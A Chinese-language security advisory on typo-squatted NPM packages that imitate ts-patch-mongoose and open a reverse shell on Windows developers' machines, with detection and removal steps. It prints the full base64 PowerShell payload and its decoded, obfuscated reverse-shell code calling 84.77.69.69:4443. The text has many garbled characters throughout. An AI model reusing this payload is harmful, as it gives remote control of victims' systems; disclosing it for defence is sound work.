共计 5909 个字符,预计需要花费 15 分钟才能阅读完成。
概述
本周(2024 年 02 月 19 号),悬镜供应链平安情报中心在 NPM 官网仓库(https://npmjs.com)中发现多起 NPM 组件包投毒事件。攻击者利用包名谬误拼写形式 (typo-squatting)在 NPM 仓库中间断公布 9 个不同版本的歹意包,试图通过仿冒非法组件(ts-patch-mongoose)来攻打潜在的 NodeJS 开发者。
开发者一旦谬误装置这些歹意组件包,则会主动触发执行歹意组件中的攻打代码,受害者零碎将被动通过反向 shell(Reverse Shell)的形式和攻击者管制的服务器端口建设后门连贯,最终导致开发者零碎被攻击者近程管制。
通过查问 NPM 官网下载接口可知这些歹意组件包最近一周总下载量约 700 次。此外思考到国内支流 NPM 镜像源也同步托管这些歹意组件,理论受害者数量可能会更多。
投毒剖析
攻打流程
以 ts-patch-moongoose 投毒包为例:
攻打指标针对 Window 零碎平台 NPM 开发者,歹意文件 mongoose.js 中调用 child\_process 模块执行通过 base64 编码后的 powershell 歹意命令。
powershell -ep bypass -e UwB0AGEAJwByAHQALQBQAHIAbwAnAGMAZQBzAHMAIAAkAFAAUwBIAE8ATQBFAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHsAJABjAGMANABiADMAZQAwADcAMAA2AGIAZQA0ADcAOAAwADkANQAyADMANQBiAGQAYgBjADUANAA3ADkAZgBkAGUAIAA9ACAATgBlAHcAJwAtAE8AYgBqAGUAJwBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwA4ADQALgA3ADcALgA2ADkALgA2ADkAJwAsADQANAA0ADMAKQA7ACQANABiAGQAZgA3ADEANwAwADEAZQA0AGUANAA1AGEANAA4AGIAZAA2ADYAOQA3ADQAYQAzADYAZAAxAGYAZAA4ACAAPQAgACQAYwBjADQAYgAzAGUAMAA3ADAANgBiAGUANAA3ADgAMAA5ADUAMgAzADUAYgBkAGIAYwA1ADQANwA5AGYAZABlAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgA3ADIAZABkADcAMABiADkAYgA1AGMANAA2ADMANQBiADQAMQAwAGMAMwBlAGQAYQAwADMAOQBkAGIAOQA4ACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkADQAYgBkAGYANwAxADcAMAAxAGUANABlADQANQBhADQAOABiAGQANgA2ADkANwA0AGEAMwA2AGQAMQBmAGQAOAAuAFIAZQBhAGQAKAAkAGIANwAyAGQAZAA3ADAAYgA5AGIANQBjADQANgAzADUAYgA0ADEAMABjADMAZQBkAGEAMAAzADkAZABiADkAOAAsACAAMAAsACAAJABiADcAMgBkAGQANwAwAGIAOQBiADUAYwA0ADYAMwA1AGIANAAxADAAYwAzAGUAZABhADAAMwA5AGQAYgA5ADgALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABmAGYAOAA4ADcAZAAwADkANQAzADUAZAA0ADYANAA4ADkANQA4ADIAZAA2ADcAZgAwADUAZQA3AGQANgAwAGYAIAA9ACAAKABOAGUAJwB3AC0ATwBiACcAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIANwAyAGQAZAA3ADAAYgA5AGIANQBjADQANgAzADUAYgA0ADEAMABjADMAZQBkAGEAMAAzADkAZABiADkAOAAsADAALAAgACQAaQApADsAJABlADkAZgAzADMAZQBlAGYAMwA3ADcANQA0ADgAZgBkAGIAOABlADIAMQAyAGEAYQBlAGMAZQBjADYAYgA0ADcAIAA9ACAAKABpAGUAeAAgACQAZgBmADgAOAA3AGQAMAA5ADUAMwA1AGQANAA2ADQAOAA5ADUAOAAyAGQANgA3AGYAMAA1AGUANwBkADYAMABmACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAMABlADcAYwBiADUAMwA3ADkANAA3AGEANAA5ADAANQBiADMANgBlADMANgBiADgAZQBmADIANQBmADkANQA1ACAAPQAgACQAZQA5AGYAMwAzAGUAZQBmADMANwA3ADUANAA4AGYAZABiADgAZQAyADEAMgBhAGEAZQBjAGUAYwA2AGIANAA3ACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAJwB3ACcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJAA5ADgANgA4ADgANgBjADEAMAA1ADkAYwA0ADkANQBlAGIAYwAzADcAYQAyADgAZgBhADgANwAzADUANAAxADkAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkADAAZQA3AGMAYgA1ADMANwA5ADQANwBhADQAOQAwADUAYgAzADYAZQAzADYAYgA4AGUAZgAyADUAZgA5ADUANQApADsAJAA0AGIAZABmADcAMQA3ADAAMQBlADQAZQA0ADUAYQA0ADgAYgBkADYANgA5ADcANABhADMANgBkADEAZgBkADgALgBXAHIAaQB0AGUAKAAkADkAOAA2ADgAOAA2AGMAMQAwADUAOQBjADQAOQA1AGUAYgBjADMANwBhADIAOABmAGEAOAA3ADMANQA0ADEAOQAsADAALAAkADkAOAA2ADgAOAA2AGMAMQAwADUAOQBjADQAOQA1AGUAYgBjADMANwBhADIAOABmAGEAOAA3ADMANQA0ADEAOQAuAEwAZQBuAGcAdABoACkAOwAkADQAYgBkAGYANwAxADcAMAAxAGUANABlADQANQBhADQAOABiAGQANgA2ADkANwA0AGEAMwA2AGQAMQBmAGQAOAAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBjADQAYgAzAGUAMAA3ADAANgBiAGUANAA3ADgAMAA5ADUAMgAzADUAYgBkAGIAYwA1ADQANwA5AGYAZABlAC4AQwBsAG8AcwBlACgAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=解码后的理论 powershell 代码如下所示:
Start-Process $PSHOME\powershell.exe -ArgumentList {$cc4b3e0706be478095235bdbc5479fde = New'-Obje'ct System.Net.Sockets.TCPClient('84.77.69.69',4443);$4bdf71701e4e45a48bd66974a36d1fd8 = $cc4b3e0706be478095235bdbc5479fde.GetStream();[byte[]]$b72dd70b9b5c4635b410c3eda039db98 = 0..65535|%{0};while(($i = $4bdf71701e4e45a48bd66974a36d1fd8.Read($b72dd70b9b5c4635b410c3eda039db98, 0, $b72dd70b9b5c4635b410c3eda039db98.Length)) -ne 0){;$ff887d09535d46489582d67f05e7d60f = (Ne'w-Ob'ject -TypeName System.Text.ASCIIEncoding).GetString($b72dd70b9b5c4635b410c3eda039db98,0, $i);$e9f33eef377548fdb8e212aaecec6b47 = (iex $ff887d09535d46489582d67f05e7d60f 2>&1 | Out-String);$0e7cb537947a4905b36e36b8ef25f955 = $e9f33eef377548fdb8e212aaecec6b47 + 'PS' + (p'w'd).Path + '>';$986886c1059c495ebc37a28fa8735419 = ([text.encoding]::ASCII).GetBytes($0e7cb537947a4905b36e36b8ef25f955);$4bdf71701e4e45a48bd66974a36d1fd8.Write($986886c1059c495ebc37a28fa8735419,0,$986886c1059c495ebc37a28fa8735419.Length);$4bdf71701e4e45a48bd66974a36d1fd8.Flush()};$cc4b3e0706be478095235bdbc5479fde.Close()} -WindowStyle Hidden歹意 PowerShell 代码利用 System.Net.Sockets.TCPClient 接口将 windows 零碎 cmd shell 反弹到攻击者管制的服务器端口 84.77.69.69:4443 上,从而达到对受害者零碎进行近程 shell 后门管制的目标。
攻打复现
- 模仿攻击者服务器 (OS:ubuntu-server IP:84.77.69.69) 并监听 tcp 4443 端口
- 模仿 NPM 开发者在 Windows 零碎上装置 ts-patch-moongoose 组件
- NPM 开发者零碎 cmd shell 胜利反弹到攻击者服务器 4443 端口,攻击者可通过反向 shell 后门在开发者零碎上近程执行任意系统命令
IoC 数据
此次投毒组件包波及的歹意文件和 IoC 数据如下所示:
排查形式
开发者可在 NodeJS 我的项目根目录下通过以下命令疾速排查是否误装置该歹意 NPM 组件包,
npm list ts-patch-moongoose
npm list ts-patch-moongoose -g若命令运行结果显示曾经装置该歹意组件,则需关闭系统网络并排查零碎是否存在异样过程,同时可通过以下命令进行卸载歹意组件包。
npm remove ts-patch-moongoose
npm remove ts-patch-moongoose -g此外,开发者也可应用 OpenSCA-cli,将受影响的组件包按如下示例保留为 db.json 文件(可参考总结中提到的组件包信息按格局增减),间接执行扫描命令(opensca-cli -db db.json -path ${project\_path}),即可疾速获知您的我的项目是否受到投毒包影响。
[
{
"product": "ts-patch-moongoose",
"version": "[1.0.0,1.0.0]||[2.0.0,2.0.0]",
"language": "javascript",
"id": "XMIRROR-MAL45-1E9AA373",
"description": "歹意 NPM 组件利用反向 shell 后门攻打 Windows 零碎 NPM 开发者。",
"release_date": "2024-02-19"
},
{
"product": "ts-patch-mongoos",
"version": "[1.0.0,1.0.0]||[2.0.0,2.0.0]",
"language": "javascript",
"id": "XMIRROR-MAL45-6963D463",
"description": "歹意 NPM 组件利用反向 shell 后门攻打 Windows 零碎 NPM 开发者。",
"release_date": "2024-02-19"
},
{
"product": "ts-patch-mongose",
"version": "[1.0.0,1.0.0]||[2.0.0,2.0.0]||[3.0.0,3.0.0]||[3.0.1,3.0.1]||[4.0.0,4.0.0]",
"language": "javascript",
"id": "XMIRROR-MAL45-60C73BA0",
"description": "歹意 NPM 组件利用反向 shell 后门攻打 Windows 零碎 NPM 开发者。",
"release_date": "2024-02-19"
}
]悬镜供应链平安情报中心将继续监测全网支流开源软件仓库,对潜在危险的开源组件包进行动静跟踪和溯源,实现疾速捕捉开源组件投毒攻打事件并第一工夫提供精准平安预警。
正文完